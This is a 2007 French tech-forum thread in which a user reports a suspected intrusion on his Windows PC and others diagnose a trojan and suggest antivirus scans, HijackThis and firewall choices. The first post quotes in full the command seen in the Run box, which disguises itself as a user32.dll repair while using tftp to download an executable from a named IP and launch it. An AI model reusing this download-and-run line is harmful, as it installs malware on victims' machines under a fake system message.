Est-ce du Hack?

Est-ce du Hack? - Sécurité - Windows & Software

Marsh Posté le 09-07-2007 à 09:51:59    

Bonjour,
 
Il y a 1/2h j'étais tranquille chez moi en train de surfer sous Windows, Je désactive mon firewall ZoneAlarm 2 min histoire de laisser un flux, puis d'un coups au bout de 5 min ya la fenetre "Executer" qui sort, puis l'invite de commande qui suit, puis la fenetre rechercher, et enfin la fenetre qui liste les processus et leur acitivité... Je réfléchis 1.3s en essayant de fermer la fenetre de l'invite de commande ou il y avait écrit:
 
Repairing user32.dll
Please wait...

 
La je me rend compte qu'il y avait un truc qui allait pas, le temps de me jeter sur le switch et débrancher le cable réseau du PC. Et par magie, tout s'arrête. Je regarde donc avec calme ce qu'il y avait été écrit dans les différentes fenêtres:
 
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 209.5.242.245 GET gjggpqz.exe & start gjggpqz&
 
dans la feneter "Executer". D'ou le "Repairing user32.dll - Please wait..."
 
après la commande tftp: j'imagine que c pour telecharger le fichier gjggpqz.exe depuis l'IP 209.5.242.245 qui apparemment se trouve au Canada, puis de lancer l'application.
Là du coup j'ai redémarrer sous LINUX et rebranché le cable reseau
 
Avez-vous déjà vu ce type de manoeuvres?? Qu'est-ce qui a été fait ou qu'est-ce qu'on a tenté de faire?
 
Merci beaucoup


Message édité par cherkan1 le 09-07-2007 à 09:53:50
Reply

Marsh Posté le 09-07-2007 à 09:51:59   

Reply

Marsh Posté le 09-07-2007 à 10:00:46    

Salut,

 

C'est bel et bien du hack. Et l'IP ne vient pas du Canada mais une IP brouillée.
En regardant sur la base internationale, on voit que le statut de l'IP n'est pas définie: http://www.ripe.net/whois?form_typ [...] rch=Search

 

edit: status: ALLOCATED UNSPECIFIED


Message édité par ogaby le 09-07-2007 à 10:01:20
Reply

Marsh Posté le 09-07-2007 à 10:14:35    


C'est bizarre je suis pourtant derrière un routeur... Une NeufBox
Je pensais que ce genre de chose ne pouvais arriver...
 
Et sinon, vous me conseillez quoi comme FireWall gratuit? Zone est bien muet et ca me plait pas trop...


Message édité par cherkan1 le 09-07-2007 à 10:16:41
Reply

Marsh Posté le 09-07-2007 à 10:15:29    

tu a surement un cheval de Troie sur ta machine, la desactiation du FW lui a permis de dir a un programme a l autre bout du monde que tu est infectable,.. et il a lancé la chose.


---------------
#mais-chut
Reply

Marsh Posté le 09-07-2007 à 10:17:41    

ah mince... comment y remédier? j'ai pourtant antiVir... qui se remet à jour régulièrement
 
Est-ce que c'est possible de le trouver à partir de linux sachant que j'ai accès à toute mes partitions?


Message édité par cherkan1 le 09-07-2007 à 10:18:41
Reply

Marsh Posté le 09-07-2007 à 10:22:10    

Z_cool a écrit :

tu a surement un cheval de Troie sur ta machine, la desactiation du FW lui a permis de dir a un programme a l autre bout du monde que tu est infectable,.. et il a lancé la chose.


 
Maintenant que j'y pense, l'antivirus m'a sortie une alerte, mais concernant un fichier normal, genre l'installation de skype ou lalors le fichier d'installation des drivers de la carte graphique... donc du coup j'y ai pas prêté attention

Reply

Marsh Posté le 09-07-2007 à 10:26:30    

Les antivirus, une fois que la machine est infecté sont tres souvent inefficace.
 
et les virus se dissimulant sous des faux nom de fichier... c'est courant


---------------
#mais-chut
Reply

Marsh Posté le 09-07-2007 à 10:31:53    

Relance ton anti-virus et si il en détecte un, note son nom et dis le nous.
 
Tu peux également installer hijackthis et tu colles le rapport sur ce site qui fera l'analyse pour toi: http://www.hijackthis.de/fr

Reply

Marsh Posté le 09-07-2007 à 10:32:30    

Donc koi la solution serait de reformater?

Reply

Marsh Posté le 09-07-2007 à 10:34:40    

cherkan1 a écrit :

Donc koi la solution serait de reformater?


la derniere solution ....
commence a voir avec ce que te dis ogaby
 
a toi de voir si tu a beaucoup de parametrage perso.


---------------
#mais-chut
Reply

Marsh Posté le 09-07-2007 à 10:34:40   

Reply

Marsh Posté le 09-07-2007 à 10:54:09    

tu as des antivirus en ligne... Essayes ca ou même d'autres gratuit comme bitdeffender free edition 8
Fais un nétoyage complet avec antispyware egalement...
Pour firewalle je te conseille jericho, gratuit,  un peu complique a parametre mais efficace.

Reply

Marsh Posté le 09-07-2007 à 16:29:32    

J'ai scanné le tout avec l'antivirus, et il m'a sorti une centaines de fichiers, tous des .exe que j'avais déjà, mais dont certains d'entre eux ont changé de taille et perdu leur icones, genre SkypeSetup.exe ne fait plus que 144k au lieu de 20Mo...
 
Après les avoir tous effacés, et effectué un test avec hijackthis, ca a l'air d'aller... donc je crois que c bon now... J'ai mis a jour Zone Alarm en passant à la 7.


Message édité par cherkan1 le 09-07-2007 à 16:34:04
Reply

Marsh Posté le 10-07-2007 à 08:39:56    

dernière fois que j ai eu un virus, il s'amusait a détruire tout les EXE en les remplaçant par son propre virus


---------------
#mais-chut
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed